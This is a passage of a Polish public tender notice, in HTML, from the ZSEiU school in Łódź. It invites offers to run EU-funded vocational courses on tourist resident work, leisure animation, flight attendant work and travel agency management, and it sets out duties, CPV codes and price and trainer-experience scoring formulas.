ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cz 3 – Rezydent turystyczny dla nauczycieli <br/>Przedmiotem zamówienia jest przeprowadzenie szkolenia „ Rezydent turystyczny” dla 2 nauczycieli ZSEiU w Łodzi w ramach projektu pn. „W kierunku Europy” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. <br/>W ramach realizacji szkolenia „Rezydent turystyczny” Wykonawca zobowiązany jest do:<br/>1. Opracowania programu szkolenia, którego celem jest umożliwienie uczestnikom zdobycie wiedzy, umiejętności i kompetencji społecznych niezbędnych do wykonywania zadań rezydenta turystycznego w tym:<br/>- podstawowe informacje o turystyce<br/>- wiedza o świecie <br/>- etyka zawodu <br/>- obowiązki i zadania rezydenta<br/>- uwarunkowania prawne<br/>- warunki pracy<br/>- terminologia międzynarodowa w turystyce<br/>- ubezpieczenie turystyczne<br/>- pomoc rezydenta w sytuacjach trudnych<br/>- postępowanie rezydenta w nagłych sytuacjach chorób i wypadków<br/>- współpraca z pracownikami hotelu, lokalnymi kontrahentami<br/>- organizacja i obsługa wypoczynku<br/>- umiejętności psychospołeczne<br/><br/>2.	Przeprowadzenia szkolenia w wymiarze co najmniej 18 godzin dydaktycznych dla 2 nauczycieli w następujących terminach: od dnia podpisania umowy do dnia 30.04.2027r. <br/>Harmonogram zajęć teoretycznych musi uwzględniać fakt, iż nauczyciele są osobami pracującymi w systemie dziennym, zatem możliwe terminy to soboty.<br/>Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić test praktyczny, potwierdzający uzyskanie przez uczestników określonych w programie szkolenia kompetencji oraz wystawić absolwentom zaświadczenie lub certyfikat potwierdzający udział w szkoleniu. <br/>3.	Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r o ochronie danych osobowych oraz Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>4.	Prowadzenia listy obecności uczestników na zajęciach i informowania Zamawiającego o nieobecnościach uczestnika kursu<br/>5.	Zapewnienia materiałów szkoleniowych takich jak: podręczniki, skrypty i inne potrzebne do realizacji szkolenia.<br/>6.	Wykonawca zobowiązany będzie po zakończeniu realizacji usługi do dostarczenia dokumentacji przebiegu szkolenia obejmującej: <br/>g) Program i harmonogram zajęć<br/>h)	Dziennik zajęć edukacyjnych obejmujących listę obecności, wymiar godzin i tematy zajęć edukacyjnych, <br/>i)	protokół z przeprowadzonego testu. <br/>j)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.<br/>k)	Kopie zaświadczeń dla uczestników<br/>l)	Innych dokumentów w związanych z realizacja kursu<br/>Ponadto:<br/>1.	Wszelka dokumentacja dotycząca kursu powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo projektu.<br/>2.	Zajęcia będą odbywać się w siedzibie Zamawiającego .<br/>3.	Zamawiający zapewni niezbędny sprzęt i narzędzia dydaktyczne ( laptopy, tablice interaktywne, rzutniki itp..) konieczne do realizacji szkolenia. Zapewni ponadto odpowiednie zaplecze dydaktyczne do realizacji zajęć praktycznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Rezydent turystyczny <br/>Przedmiotem zamówienia jest przeprowadzenie szkolenia „ Rezydent turystyczny” dla 20 uczniów ZSEiU w Łodzi w ramach projektu pn. „W kierunku Europy” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. <br/>W ramach realizacji szkolenia „Rezydent turystyczny” Wykonawca zobowiązany jest do:<br/>1. Opracowania programu szkolenia, którego celem jest umożliwienie uczestnikom zdobycie wiedzy, umiejętności i kompetencji społecznych niezbędnych do w tym:<br/>- podstawowe informacje o turystyce<br/>- wiedza o świecie <br/>- etyka zawodu <br/>- obowiązki i zadania rezydenta<br/>- uwarunkowania prawne<br/>- warunki pracy<br/>- terminologia międzynarodowa w turystyce<br/>- ubezpieczenie turystyczne<br/>- pomoc rezydenta w sytuacjach trudnych<br/>- postępowanie rezydenta w nagłych sytuacjach chorób i wypadków<br/>- współpraca z pracownikami hotelu, lokalnymi kontrahentami<br/>- organizacja i obsługa wypoczynku<br/>- umiejętności psychospołeczne<br/><br/>2.	Przeprowadzenia szkolenia w wymiarze co najmniej 18 godzin dydaktycznych dla 2 grup uczestników po 10 osób w grupie w następujących terminach: od dnia podpisania umowy do dnia 30.04.2027r. <br/>Harmonogram zajęć teoretycznych musi uwzględniać fakt, iż uczestnicy są osobami uczącymi się w systemie dziennym, zatem możliwe terminy to soboty.<br/>Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić test praktyczny, potwierdzający uzyskanie przez uczestników określonych w programie szkolenia kompetencji oraz wystawić absolwentom zaświadczenie lub certyfikat potwierdzający udział w szkoleniu. <br/>3.	Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r o ochronie danych osobowych oraz Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>4.	Prowadzenia listy obecności uczestników na zajęciach i informowania Zamawiającego o nieobecnościach uczestnika kursu<br/>5.	Zapewnienia materiałów szkoleniowych takich jak: podręczniki, skrypty i inne potrzebne do realizacji szkolenia.<br/>6.	Wykonawca zobowiązany będzie po zakończeniu realizacji usługi do dostarczenia dokumentacji przebiegu szkolenia obejmującej: <br/>m) Program i harmonogram zajęć<br/>n)	Dziennik zajęć edukacyjnych obejmujących listę obecności, wymiar godzin i tematy zajęć edukacyjnych, <br/>o)	protokół z przeprowadzonego testu. <br/>p)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.<br/>q)	Kopie zaświadczeń dla uczestników<br/>r)	Innych dokumentów w związanych z realizacja kursu<br/>Ponadto:<br/>1.	Wszelka dokumentacja dotycząca kursu powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo projektu.<br/>2.	Zajęcia będą odbywać się w siedzibie Zamawiającego .<br/>3.	Zamawiający zapewni niezbędny sprzęt i narzędzia dydaktyczne ( laptopy, tablice interaktywne, rzutniki itp..) konieczne do realizacji szkolenia. Zapewni ponadto odpowiednie zaplecze dydaktyczne do realizacji zajęć praktycznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – Animator czasu wolnego <br/><br/>Przedmiotem zamówienia jest przeprowadzenie szkolenia „ Animator czasu wolnego” dla 20 uczniów ZSEiU w Łodzi w ramach projektu pn. „W kierunku Europy” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. <br/>W ramach realizacji szkolenia „Animator czasu wolnego „Wykonawca zobowiązany jest do:<br/><br/>1.	Opracowania programu szkolenia, którego celem jest przygotowanie uczestników szkolenia do pracy na stanowisku animatora czasu wolnego, w tym do roli osoby organizującej i prowadzącej różnorodne aktywności rekreacyjne i rozrywkowe dla różnych grup wiekowych<br/>2.	Przeprowadzenia szkolenia w wymiarze co najmniej 18 godzin dydaktycznych dla 2 grup uczestników po 10 osób w grupie w następujących terminach: od dnia podpisania umowy do dnia 30.04.2025r.<br/>Harmonogram zajęć teoretycznych musi uwzględniać fakt, iż uczestnicy są osobami uczącymi się w systemie dziennym, zatem możliwe terminy to soboty.<br/>Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić test praktyczny, potwierdzający uzyskanie przez uczestników określonych w programie szkolenia kompetencji oraz wystawić absolwentom zaświadczenie lub certyfikat potwierdzający udział w szkoleniu. <br/>3.	Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r o ochronie danych osobowych oraz Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>4.	Prowadzenia listy obecności uczestników na zajęciach i informowania Zamawiającego o nieobecnościach uczestnika kursu<br/>5.	Zapewnienia materiałów szkoleniowych takich jak: podręczniki, skrypty, balony, papiery kolorowe, bibuły, obręcze i inne materiały potrzebne do przeprowadzenia szkolenia.<br/>6.	Wykonawca zobowiązany będzie po zakończeniu realizacji usługi do dostarczenia dokumentacji przebiegu szkolenia obejmującej: <br/>s) Program i harmonogram zajęć<br/>t)	Dziennik zajęć edukacyjnych obejmujących listę obecności, wymiar godzin i tematy zajęć edukacyjnych, <br/>u)	protokół z przeprowadzonego testu. <br/>v)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.<br/>w)	Kopie zaświadczeń dla uczestników<br/>x)	Innych dokumentów w związanych z realizacja kursu<br/>Ponadto:<br/>1.	Wszelka dokumentacja dotycząca kursu powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo projektu.<br/>2.	Zajęcia będą odbywać się w siedzibie Zamawiającego .<br/>3.	Zamawiający zapewni niezbędny sprzęt i narzędzia dydaktyczne ( laptopy, tablice interaktywne, rzutniki itp..) konieczne do realizacji szkolenia. Zapewni ponadto odpowiednie zaplecze dydaktyczne do realizacji zajęć praktycznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 Jak zostać stewardessa<br/>Przedmiotem zamówienia jest przeprowadzenie szkolenia &#34; Jak zostać Stewardessą&#34; dla 20 uczniów ZSEiU w Łodzi w ramach projektu pn. &#34;W kierunku Europy&#34; współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 - 2027. W ramach realizacji szkolenia „Jak zostać Stewardessą” Wykonawca zobowiązany jest do:<br/><br/>1.	Opracowania programu szkolenia, którego celem jest wskazanie uczestnikom możliwości pracy w zawodzie stewarda/ stewardessy i przedstawienie wybranych elementów procesu rekrutacji, zapoznanie ze specyfiką pracy personelu pokładowego ( grafik pracy, obowiązki ,korzyści), wprowadzenie do tematu obsługi ruchu lotniczego w Polsce i na świecie, obsługę pasażerów, zasady bezpieczeństwa, procedury awaryjne i pierwszą pomoc.<br/>2.	Przeprowadzenia szkolenia w wymiarze co najmniej 18 godzin dydaktycznych dla 2 grup uczestników po 10 osób w grupie w następujących terminach: od dnia podpisania umowy do dnia 30.04.2027r.<br/>Harmonogram zajęć teoretycznych musi uwzględniać fakt, iż uczestnicy są osobami uczącymi się w systemie dziennym, zatem możliwe terminy to soboty.<br/>Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić test praktyczny, potwierdzający uzyskanie przez uczestników określonych w programie szkolenia kompetencji oraz wystawić absolwentom zaświadczenie lub certyfikat potwierdzający udział w szkoleniu. <br/>3.	Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r o ochronie danych osobowych oraz Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>4.	Prowadzenia listy obecności uczestników na zajęciach i informowania Zamawiającego o nieobecnościach uczestnika kursu<br/>5.	Zapewnienia materiałów szkoleniowych takich jak: podręczniki, skrypty, makiety, odzież i inne akcesoria potrzebne do przeprowadzenia szkolenia.<br/>6.	Wykonawca zobowiązany będzie po zakończeniu realizacji usługi do dostarczenia dokumentacji przebiegu szkolenia obejmującej: <br/>y) Program i harmonogram zajęć<br/>z)	Dziennik zajęć edukacyjnych obejmujących listę obecności, wymiar godzin i tematy zajęć edukacyjnych, <br/>aa)	protokół z przeprowadzonego testu. <br/>bb)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.<br/>cc)	Kopie zaświadczeń dla uczestników<br/>dd)	Innych dokumentów w związanych z realizacja kursu<br/>Ponadto:<br/>1.	Wszelka dokumentacja dotycząca kursu powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo projektu.<br/>2.	Zajęcia będą odbywać się w siedzibie Zamawiającego .<br/>3.	Zamawiający zapewni niezbędny sprzęt i narzędzia dydaktyczne ( laptopy, tablice interaktywne, rzutniki itp..) konieczne do realizacji szkolenia. Zapewni ponadto odpowiednie zaplecze dydaktyczne do realizacji zajęć praktycznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 – jak prowadzić biuro podróży<br/><br/>Przedmiotem zamówienia jest przeprowadzenie szkolenia „ Prowadzenie biura podróży” dla 2 nauczycieli ZSEiU w Łodzi w ramach projektu pn. „W kierunku Europy” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Regionalne Fundusze Europejskie dla Łódzkiego na lata 2021 – 2027. <br/>W ramach realizacji szkolenia „Prowadzenie biura podróży” Wykonawca zobowiązany jest do:<br/>1.	Opracowania programu szkolenia, którego celem jest: zapoznanie uczestników z:<br/>- wymogami formalno-prawnymi rejestracji wybranej formy działalności turystycznej; <br/>- nawiązywaniem współpracy z organizatorami turystki aby móc sprzedawać ich ofertę;<br/>- uzyskaniem gwarancji ubezpieczeniowej aby móc działać jako organizator turystyki;<br/>- prowadzeniem procesów sprzedaży w biurze podróży.<br/>2.	Przeprowadzenia szkolenia w wymiarze co najmniej 18 godzin dydaktycznych dla 2 nauczycieli w następujących terminach: od dnia podpisania umowy do dnia 30.04.2025r.<br/>Harmonogram zajęć teoretycznych musi uwzględniać fakt, iż nauczyciele są osobami pracującymi w systemie dziennym, zatem możliwe terminy to soboty.<br/>Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić test praktyczny, potwierdzający uzyskanie przez uczestników określonych w programie szkolenia kompetencji oraz wystawić absolwentom zaświadczenie lub certyfikat potwierdzający udział w szkoleniu. <br/>3.	Przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r o ochronie danych osobowych oraz Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>4.	Prowadzenia listy obecności uczestników na zajęciach i informowania Zamawiającego o nieobecnościach uczestnika kursu<br/>5.	Zapewnienia materiałów 